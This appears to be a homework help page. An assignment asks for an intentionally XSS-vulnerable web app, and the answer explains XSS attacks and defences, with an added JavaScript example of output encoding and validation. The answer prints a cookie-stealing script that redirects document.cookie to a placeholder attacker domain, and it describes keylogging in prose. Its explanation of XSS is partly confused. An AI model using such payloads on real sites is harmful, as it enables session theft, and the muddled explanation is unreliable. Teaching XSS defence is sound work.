you’ll be creating a vulnerable web application that is susceptible to a XSS att
Question
You’ll be creating a vulnerable web application that is susceptible to an XSS attack. XSS attacks are very common out there
so I am sure you can find plenty of discussion about it with a Google search. Create a web application (it does not have to be anything fancy or complicated,
just enough to demonstrate the XSS vulnerability and it has to be your own code). If you don’t already have some sort of web server available, you will need to
stand one up, perhaps in a Virtual Machine. Some servers will provide XSS protection natively so you may need to disable that before your attack succeeds.
You can choose the server-side language as long as the page renders in a typical browser.
Provide a screenshot proof of your XSS vulnerability being exploited by you including the script you inject and the resulting effect on the web application.
In your write-up, discuss your vulnerability briefly and make a recommendation of how you would fix/prevent this attack from succeeding.
Explanation / Answer
XSS attack:
This means the attacker can execute malicious JavaScript code in their browser.
The attacker can inject their code into our web page directly in the browser, so the JavaScript acts as part of the code of your web site.
e.g.:
<html>
<head></head>
<body>
<form method="post">
login information.
</form>
</body>
</html>
Consider that the above code is used to log in to the web site. Here the attacker can insert their own code to log in to the website using false values. For example, they can modify the JavaScript and try to submit the form using false values without any client-side validation.
The code will be updated like this:
<html>
<head></head>
<body>
<form method="post">
login information.
</form>
<script>
// comment or modify the login page validation using false values.
</script>
</body>
</html>
Types of XSS attack:
Phishing:
As per the above example, the attacker can insert fake information using DOM objects and set the form post origin/target to their own browser. Then, if the user submits the form with their sensitive information, that info will be redirected to the attacker's browser.
Keylogging:
Using addEventListener, the attacker can register a keyboard event listener. With this, all the keystroke information will be sent to the attacker's server.
e.g.: password.
Cookie:
The attacker can try to access our server cookies using document.cookie, and this will send all info about the cookies to the attacker's server.
e.g.:
<script>
window.location='http://attacker-domain-name?cookie-info='+document.cookie
</script>
window.location is used to locate/redirect the window to a target server/page, so this will redirect the web page with the cookie info to the attacker's server when cookies are created on a particular page.
To protect a website from XSS attacks:
- Try to encode the sensitive values
So that the attacker cannot decode, or finds it complicated to decode, the sensitive values even if they attack.
e.g.:
<html>
<head></head>
<body>
<form method="post">
encodeData(login information.)
</form>
</body>
</html>
Encode the data before submitting your form values.
- Validation:
This is used to filter the user values using our methods, so that fake info can't be entered into our websites.
- Client side/ server side validation:
Try to do different phases of validation in both the client-side script and the server-side script.
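The encoding and validation recommendations above, shown as an added example that is not part of the original answer: a page fragment that concatenates user input into HTML, next to the same fragment with output encoding and a server-side allow-list check. All function names and the sample inputs are assumptions constructed for illustration.

```javascript
// Added example; escapeHtml, renderVulnerable, renderEncoded, isValidUsername
// and handleLogin are hypothetical names, not from the original answer.

// The five characters that can change HTML structure, mapped to entities.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Output encoding: applied at the moment user data is written into the page.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// "Before": input is concatenated into markup, so a <script> tag in the
// input becomes part of the page's own code.
function renderVulnerable(username) {
  return '<p>Welcome, ' + username + '</p>';
}

// "After": the value is encoded, so the browser displays it as plain text.
function renderEncoded(username) {
  return '<p>Welcome, ' + escapeHtml(username) + '</p>';
}

// Server-side validation with an allow-list: letters, digits, underscore,
// 3 to 20 characters. Client-side checks can be bypassed, so this runs on
// the server regardless of what the form script does.
function isValidUsername(username) {
  return typeof username === 'string' && /^[A-Za-z0-9_]{3,20}$/.test(username);
}

// Validate first, then still encode on output (two independent layers).
function handleLogin(username) {
  if (!isValidUsername(username)) {
    return { status: 400, body: '<p>Invalid user name.</p>' };
  }
  return { status: 200, body: renderEncoded(username) };
}

// Constructed sample inputs: one normal value, one markup probe, one value
// with characters that are legitimate text but must be encoded.
const samples = ['alice_01', '<script>alert(1)</script>', 'Tom & "Jerry"'];
for (const s of samples) {
  console.log(handleLogin(s).status, '|', renderVulnerable(s), '|', renderEncoded(s));
}
```

The encoded output for the second sample shows the tag as visible text in the browser, while the vulnerable output hands it to the HTML parser as a script element.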